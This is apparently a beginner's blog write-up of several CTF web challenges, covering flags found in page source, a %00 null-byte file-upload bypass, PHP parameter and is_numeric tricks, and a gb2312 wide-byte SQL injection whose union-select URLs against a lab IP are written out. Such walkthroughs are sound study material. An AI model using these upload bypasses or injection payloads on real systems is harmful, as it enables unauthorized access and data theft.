Blogging for the first time
web2
Opening a web page is an ever-accelerating animation with no particular clue.
Right-click to view the element, and the result flag is in the body comment, as shown in the figure:
ps: I feel that this question is not very rewarding. Maybe you can understand the js code of this question, just like learning js.
file upload test
Test: You need to upload a php file to get the flag, but only image files are allowed to upload
Ideas : Use %00 to truncate the uploaded file
Process: Construct a file named 1.php.jpg for uploading and use burp to capture the package (as shown in the figure):
Modify the file name : Add %00 truncation after .php, perform url decoding and restore to empty characters, submit to get flag
Before decoding: 
calculator
Open the webpage to display the interface as follows:
Try to enter the answer, and find that the input length of the form is 1.
Ideas: Modify the maxlenth attribute of the input box through the element, enter the calculation result and submit it, and get the flag. (pictured)
webbase$_GET
Open the page and get the following code:
$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';Simply put, pass in parameters through get: what=flag
to get flag
web base $_POST
Open the page and get the following code:
$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';Parsing: Pass in parameters through get: what=flag
to get flag (post parameters can use the Firefox plug-in hackbar)
contradiction
Open the page and get the following code:
$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}Code analysis:
Function: is_numeric()
is_numeric() — Checks if a variable is a number or a string of numbers
Syntax :bool is_numeric ( mixed $var )
Returns TRUE if var is a number and string of numbers, FALSE otherwise.
logic:
Pass in the parameter num through get. To get the flag, num cannot be a number or a number string, and num==1
is obviously contradictory.
Ideas:
Represent 1 by scientific notation, because scientific notation is not a pure number and can be equal to one.
php scientific notation format: coefficient e+exponent
Example : 1000==1e+3 1234=1.234e+3 1=1e+0 input
num=1e+0 to get flag
web3
When opening the page, pop-up boxes keep appearing. After disabling the pop-up box, view the element.
It is found that there is such a line of code in the script tag: it feels like unicode encoding: try to decode (you can use the webmaster tool, just search on the Internet) to decode and get the flag
<!--KEY{J2sa42ahJK-HS11III}-->
Here's a question:
� + decimal and &#x + hexadecimal both seem to indicate unicode
encoding Well, that's how I understand it, I don't know if it's right
sql injection
Open the page as shown in the figure:
ask to query the key table, the string field of id=1
Test : single quotes and double quotes return normal, they should be escaped, check the page elements and find that gb2312 encoding is used,
then try wide byte injection:
http://103.238.227.13:10083/?id=1%bf‘–+
http://103.238.227.13:10083/?id=1%bf’ and 1=1–+
http://103.238.227.13:10083/?id=1%bf’ and 1=2–+
If no comment is added, an error will be reported, and if a comment is added, it will return to normal, there is logical judgment, and there is injection.
Judging the number of fields:
http://103.238.227.13:10083?id=1%bf’ order by 2–+
Judgment echo point:
http://103.238.227.13:10083?id=0%bf’ union select 1,2–+
Check database:
http://103.238.227.13:10083?id=0%bf ' union select database(), 2–+
database: sql5
Get the flag by combining the title:
http://103.238.227.13:10083?id=0%bf’ union select string,2 from sql5.key–+
得到flag